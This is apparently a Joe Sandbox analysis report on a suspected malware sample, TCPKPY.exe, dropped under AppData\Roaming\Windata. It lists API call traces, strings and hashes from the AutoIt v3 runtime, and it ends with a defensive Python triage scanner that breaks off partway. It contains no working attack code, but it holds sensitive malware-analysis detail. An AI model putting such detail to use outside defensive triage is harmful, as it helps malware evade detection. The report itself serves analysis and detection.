                                                                                                                • __dosmaperr.LIBCMT ref: 00236CE4
                                                                                                                • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00236CF7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00236D1A
                                                                                                                • __dosmaperr.LIBCMT ref: 00236D23
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00236D2C
                                                                                                                • __set_osfhnd.LIBCMT ref: 00236D5C
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00236DC6
                                                                                                                • __close_nolock.LIBCMT ref: 00236DEC
                                                                                                                • __chsize_nolock.LIBCMT ref: 00236E1C
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00236E2E
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00236F26
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00236F3B
                                                                                                                • __close_nolock.LIBCMT ref: 00236F9B
                                                                                                                  • Part of subcall function 0022F84C: CloseHandle.KERNEL32(00000000,002AEEC4,00000000,?,00236DF1,002AEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0022F89C
                                                                                                                  • Part of subcall function 0022F84C: GetLastError.KERNEL32(?,00236DF1,002AEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0022F8A6
                                                                                                                  • Part of subcall function 0022F84C: __free_osfhnd.LIBCMT ref: 0022F8B3
                                                                                                                  • Part of subcall function 0022F84C: __dosmaperr.LIBCMT ref: 0022F8D5
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00236FBD
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002370F2
                                                                                                                • ___createFile.LIBCMT ref: 00237111
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0023711E
                                                                                                                • __dosmaperr.LIBCMT ref: 00237125
                                                                                                                • __free_osfhnd.LIBCMT ref: 00237145
                                                                                                                • __invoke_watson.LIBCMT ref: 00237173
                                                                                                                • __wsopen_helper.LIBCMT ref: 0023718D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                • String ID: 9A"$@
                                                                                                                • API String ID: 3896587723-4115013642
                                                                                                                • Opcode ID: 1cb60079d9f97d8761abaae17a47611e2ccfd7cb1a6975ea2cc095a2ae1f451c
                                                                                                                • Instruction ID: 0ada4b6ae17ae0aac16f07d686a3e08749cbdc34d127e2c4dd08f1226e20b5f6
                                                                                                                • Opcode Fuzzy Hash: 1cb60079d9f97d8761abaae17a47611e2ccfd7cb1a6975ea2cc095a2ae1f451c
                                                                                                                • Instruction Fuzzy Hash: 342259F192410AABEF258FA8DC59BAD7B69EF00324F248229E511E72D1C7758D70CB51

                                                                                                                 Control-flow Graph

                                                                                                                 (Graph for the function at 201f04; rendered graph data not reproduced. Legend: Executed / Not Executed.)
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • GetForegroundWindow.USER32 ref: 00201FBE
                                                                                                                • IsWindow.USER32(?), ref: 0027282E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Foreground_memmove
                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                • API String ID: 3828923867-1919597938
                                                                                                                • Opcode ID: f5d47399415cd5c6638f91a57e4bfda8d5adb766fe6e6f439315c5d75f599203
                                                                                                                • Instruction ID: 33b20fa1f790bd1b2f78d6ebb67fd0ceb46b00160fdeed17aae4e5e7dc73f9a4
                                                                                                                • Opcode Fuzzy Hash: f5d47399415cd5c6638f91a57e4bfda8d5adb766fe6e6f439315c5d75f599203
                                                                                                                • Instruction Fuzzy Hash: C9D1EA30124703DBCB08EF14C581AAABBA5BF54344F148A2DF459575A2DB31E9BDCFA2

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,00000104,?,00000000,00000001,00000000), ref: 0020428C
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                  • Part of subcall function 00221BC7: __wcsicmp_l.LIBCMT ref: 00221C50
                                                                                                                • _wcscpy.LIBCMT ref: 002043C0
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0027214E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe$CMDLINE$CMDLINERAW
                                                                                                                • API String ID: 861526374-4203412346
                                                                                                                • Opcode ID: 19a092e40f053153e04758b2a73d910d7743e333fb62703ec14ea75dbe78e986
                                                                                                                • Instruction ID: 6e2748c40ded017134dc9702add6e74459fa98d6e4dc4fc4329819bde511c215
                                                                                                                • Opcode Fuzzy Hash: 19a092e40f053153e04758b2a73d910d7743e333fb62703ec14ea75dbe78e986
                                                                                                                • Instruction Fuzzy Hash: 308184B2920219AACB05EBE0DD52EEF77B8AF15350F604015F645B70C3EB706A68CF61

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0021EA39
                                                                                                                • __wsplitpath.LIBCMT ref: 0021EA56
                                                                                                                  • Part of subcall function 0022297D: __wsplitpath_helper.LIBCMT ref: 002229BD
                                                                                                                • _wcsncat.LIBCMT ref: 0021EA69
                                                                                                                • __makepath.LIBCMT ref: 0021EA85
                                                                                                                  • Part of subcall function 00222BFF: __wmakepath_s.LIBCMT ref: 00222C13
                                                                                                                  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                • _wcscpy.LIBCMT ref: 0021EABE
                                                                                                                  • Part of subcall function 0021EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0021EADA,?,?), ref: 0021EB27
                                                                                                                • _wcscat.LIBCMT ref: 002732FC
                                                                                                                • _wcscat.LIBCMT ref: 00273334
                                                                                                                • _wcsncpy.LIBCMT ref: 00273370
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                • String ID: Include$\$",
                                                                                                                • API String ID: 1213536620-1107123480
                                                                                                                • Opcode ID: d2c0d933a4d46bcd5aca77bfe2cf3d20042bf61b1390fc33a88c204f299346f0
                                                                                                                • Instruction ID: 5da25e066c92ae36bfedc29e2b04b04010e556f2f63b069103945f0ade69b738
                                                                                                                • Opcode Fuzzy Hash: d2c0d933a4d46bcd5aca77bfe2cf3d20042bf61b1390fc33a88c204f299346f0
                                                                                                                • Instruction Fuzzy Hash: AF515FB1414380EBC315EF94FC89C96B7E8FB59300B80495EF949932A2EF749658CF66

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00202F8B
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 00202FB5
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00202FC6
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00202FE3
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00202FF3
                                                                                                                • LoadIconW.USER32(000000A9), ref: 00203009
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00203018
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: 6969bccaafa9d84d34a13d575d6e8c2f49d08343bbd38c649cdae70d28dab7da
                                                                                                                • Instruction ID: 773c0f7ac633ba502d615a3a7ed6865bb5e395e21f6d2661f666e2886bdb61a8
                                                                                                                • Opcode Fuzzy Hash: 6969bccaafa9d84d34a13d575d6e8c2f49d08343bbd38c649cdae70d28dab7da
                                                                                                                • Instruction Fuzzy Hash: 5421B2B9905318AFEB009FA4F84EBCDBBF4FB09700F10421AF615A62A0D7B14568CF91

                                                                                                                 Control-flow Graph

                                                                                                                 (Graph for the function at 2029c2; rendered graph data not reproduced. Legend: Executed / Not Executed.)
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00202A33
                                                                                                                • KillTimer.USER32(?,00000001), ref: 00202A5D
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00202A80
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00202A8B
                                                                                                                • CreatePopupMenu.USER32 ref: 00202A9F
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00202AAE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                • String ID: TaskbarCreated
                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                • Opcode ID: efc08e14f6b4b0652affedb3aa23506da6c681ff1f41f79f61926e98ff1479a9
                                                                                                                • Instruction ID: 9305b65d1830c0fb2102cf9cfa7cc500172978d437300f4440067e08a46eacba
                                                                                                                • Opcode Fuzzy Hash: efc08e14f6b4b0652affedb3aa23506da6c681ff1f41f79f61926e98ff1479a9
                                                                                                                • Instruction Fuzzy Hash: 0841CF3123434ADBDB24AF68AC1EF793759AB15300F144216FD06921E3EEB4987C8765

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 002030B0
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 002030BF
                                                                                                                • LoadIconW.USER32(00000063), ref: 002030D5
                                                                                                                • LoadIconW.USER32(000000A4), ref: 002030E7
                                                                                                                • LoadIconW.USER32(000000A2), ref: 002030F9
                                                                                                                  • Part of subcall function 0020318A: LoadImageW.USER32(00200000,00000063,00000001,00000010,00000010,00000000), ref: 002031AE
                                                                                                                • RegisterClassExW.USER32(?), ref: 00203167
                                                                                                                  • Part of subcall function 00202F58: GetSysColorBrush.USER32(0000000F), ref: 00202F8B
                                                                                                                  • Part of subcall function 00202F58: RegisterClassExW.USER32(00000030), ref: 00202FB5
                                                                                                                  • Part of subcall function 00202F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00202FC6
                                                                                                                  • Part of subcall function 00202F58: InitCommonControlsEx.COMCTL32(?), ref: 00202FE3
                                                                                                                  • Part of subcall function 00202F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00202FF3
                                                                                                                  • Part of subcall function 00202F58: LoadIconW.USER32(000000A9), ref: 00203009
                                                                                                                  • Part of subcall function 00202F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00203018
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                • Opcode ID: 54af4179c0b0bf04686f56b4168b26ba0839baf163de9cd76ee71901c8bbae04
                                                                                                                • Instruction ID: fb61da42bf8e6592707123babd6c5992b37b1e900c221501fbf626d57dc81dde
                                                                                                                • Opcode Fuzzy Hash: 54af4179c0b0bf04686f56b4168b26ba0839baf163de9cd76ee71901c8bbae04
                                                                                                                • Instruction Fuzzy Hash: AC213CB4D10304AFDB00DFA9FC4EE99BBF5FB49310F14412AE618A22A2D7B545648F91

                                                                                                                Control-flow Graph

                                                                                                                Control-flow graph (rendered image not extracted; block summary): entry block 22ba66-22ba93 (calls 227750, 228984, 227616); Win32 calls in blocks 22baf5-22bb04 (GetStartupInfoW), 22bc7c-22bc88 (GetStdHandle), 22bb8a-22bb96 and 22bc8e-22bc97 (GetFileType), 22bb98-22bbcd and 22bcbb-22bccd (InitializeCriticalSectionAndSpinCount); exit path 22bd05-22bd0a (call 227795).
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 0022BA74
                                                                                                                  • Part of subcall function 00228984: __mtinitlocknum.LIBCMT ref: 00228996
                                                                                                                  • Part of subcall function 00228984: EnterCriticalSection.KERNEL32(00220127,?,0022876D,0000000D), ref: 002289AF
                                                                                                                • __calloc_crt.LIBCMT ref: 0022BA85
                                                                                                                  • Part of subcall function 00227616: __calloc_impl.LIBCMT ref: 00227625
                                                                                                                  • Part of subcall function 00227616: Sleep.KERNEL32(00000000,?,00220127,?,0020125D,00000058,?,?), ref: 0022763C
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0022BAA0
                                                                                                                • GetStartupInfoW.KERNEL32(?,002B6990,00000064,00226B14,002B67D8,00000014), ref: 0022BAF9
                                                                                                                • __calloc_crt.LIBCMT ref: 0022BB44
                                                                                                                • GetFileType.KERNEL32(00000001), ref: 0022BB8B
                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0022BBC4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 1426640281-0
                                                                                                                • Opcode ID: 6ac2799e90a0fe6404d4d01f33813741344005b643df9212d55e98a2d2b4a563
                                                                                                                • Instruction ID: 28fb7309fc356099900cfc41dccbde68c9c1bdbf2417be94fba701cf00ca39c6
                                                                                                                • Opcode Fuzzy Hash: 6ac2799e90a0fe6404d4d01f33813741344005b643df9212d55e98a2d2b4a563
                                                                                                                • Instruction Fuzzy Hash: 28812970925366EFCB15CFA8E8846ADBBF0AF45324B24425ED466AB3D1CB349813CF54

                                                                                                                Control-flow Graph

                                                                                                                Control-flow graph (rendered image not extracted; block summary): entry block 2045a7-2045e0; Win32 calls in blocks 2045e6-2045fe (mciSendStringW), 204695-2046a0 (CoUninitialize), 2047b5-2047d0 (UnregisterHotKey), 275935-275936 (DestroyWindow), 27595a-275976 (FindClose), 27599b-27599d (FreeLibrary), 2759c0-2759dd (VirtualFree); teardown chain 2046a6-20475a and 20475f-2047a5 consists of internal subcalls only.
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002045F0
                                                                                                                • CoUninitialize.COMBASE ref: 00204695
                                                                                                                • UnregisterHotKey.USER32(?), ref: 002047BD
                                                                                                                • DestroyWindow.USER32(?), ref: 00275936
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0027599D
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002759CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                • String ID: close all
                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                • Opcode ID: e40949b0b00386f2482f51b3fab6c9678776d0787c277d107cd4a96b0e156f76
                                                                                                                • Instruction ID: b75b4882335066a58abdd1fbd04366f7ca7b21c6e1b093a7e09bda6f698760aa
                                                                                                                • Opcode Fuzzy Hash: e40949b0b00386f2482f51b3fab6c9678776d0787c277d107cd4a96b0e156f76
                                                                                                                • Instruction Fuzzy Hash: 61915074621712CFD719EF14D899A69F3A8FF15300F5081AAE50A972A3DB30AD7ACF50

                                                                                                                Control-flow Graph

                                                                                                                Control-flow graph (rendered image not extracted; block summary): entry block 21eb05-21eb2f (call 20c4cd, RegOpenKeyExW); on success 274b17-274b2e (RegQueryValueExW, size probe) then 274b30-274b6d (call 22010a, call 204bce, RegQueryValueExW, data read); 274b6f-274b86 / 274b88-274b90 handle the result; exit 274b91-274b9a (RegCloseKey); failure path 21eb35-21eb39.
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0021EADA,?,?), ref: 0021EB27
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0021EADA,?,?), ref: 00274B26
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0021EADA,?,?), ref: 00274B65
                                                                                                                • RegCloseKey.ADVAPI32(?,?,0021EADA,?,?), ref: 00274B94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                • API String ID: 1586453840-614718249
                                                                                                                • Opcode ID: 343d84e5346b855b1c1638d1dce85be5a23224832a8ebaa4a7c59b88bf58f36e
                                                                                                                • Instruction ID: b9dd719444e32e64aba615c160e86e988439f2e905f4717c8ab8e5bc2ecba4af
                                                                                                                • Opcode Fuzzy Hash: 343d84e5346b855b1c1638d1dce85be5a23224832a8ebaa4a7c59b88bf58f36e
                                                                                                                • Instruction Fuzzy Hash: 8B117F71A15208BEEB04AFA4DC86EFE77BCEF04358F104055B506E70D1EA70AE25EB50

                                                                                                                Control-flow Graph

                                                                                                                Control-flow graph (rendered image not extracted; block summary): single basic block 202e9d-202f0d calling CreateWindowExW twice and ShowWindow twice.
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00202ECB
                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00202EEC
                                                                                                                • ShowWindow.USER32(00000000), ref: 00202F00
                                                                                                                • ShowWindow.USER32(00000000), ref: 00202F09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow
                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                • Opcode ID: 3bbb18ef4146e84afabed64875b9283a5a8cb856be9df963b8769e50937d8029
                                                                                                                • Instruction ID: 85a1abe198b9788a3079b7fc0366c2b8aef70d02fa6775965ab82c487b91d4b9
                                                                                                                • Opcode Fuzzy Hash: 3bbb18ef4146e84afabed64875b9283a5a8cb856be9df963b8769e50937d8029
                                                                                                                • Instruction Fuzzy Hash: E6F03A70A502D07AEB305763BC0EE672E7EEBC7F20B01401EBE08A21A1D16508B5DAB0
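
The functions above (the HKCU\Software\AutoIt v3\AutoIt registry read, the RegisterClassExW / CreateWindowExW calls with the class name "AutoIt v3", the hidden "edit" control and the TaskbarCreated registration) are the stock AutoIt v3 runtime, so the interesting payload is the compiled script the runtime carries, not the PE code. The following triage scanner is an added example, not part of the Joe Sandbox report or of the sample: it searches a binary for the UTF-16LE strings the Wide APIs above receive, and, as an extra indicator taken from general knowledge of the AutoIt3 format rather than from this report, for the "AU3!EA06" marker that precedes the embedded compiled script. The TaskbarCreated message is registered by any tray-icon application, so it is reported but carries no weight in the verdict; the sample bytes below are constructed for the demonstration.

```python
"""Triage scanner: does this binary carry the AutoIt v3 runtime?

Added example (not from the report). Indicators come from the Wide-string
API arguments shown in the disassembly; the AU3 marker is an assumption
from general knowledge of AutoIt3 compiled binaries, not from the report.
"""
import sys

# Strings the AutoIt runtime passes to RegOpenKeyExW, RegisterClassExW /
# CreateWindowExW and RegisterWindowMessageW. Wide APIs -> UTF-16LE in the image.
AUTOIT_INDICATORS = {
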